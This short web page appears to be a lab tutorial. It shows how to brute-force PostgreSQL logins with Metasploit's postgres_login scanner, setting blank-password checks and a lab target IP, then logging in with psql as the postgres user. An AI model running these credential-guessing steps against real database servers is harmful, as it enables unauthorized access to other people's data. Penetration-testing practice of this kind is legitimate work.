Attack PostgreSQL – This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.
Rapid 7
What is PostgreSQL?
PostgreSQL is a powerful, open source object-relational database system with over 30 years of active development that has earned it a strong reputation for reliability, feature robustness, and performance.
Port 5432 Vulnerabilities
Attacking PostgreSQL with Metasploit

use auxiliary/scanner/postgres/postgres_login

msf5 auxiliary(scanner/postgres/postgres_login) > show options
msf5 auxiliary(scanner/postgres/postgres_login) > set BLANK_PASSWORDS true
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 172.16.74.129
Attack PostgreSQL Server
msf5 auxiliary(scanner/postgres/postgres_login) > exploit

root@poplab:~# psql -h 172.16.74.129 -U postgres -W postgres
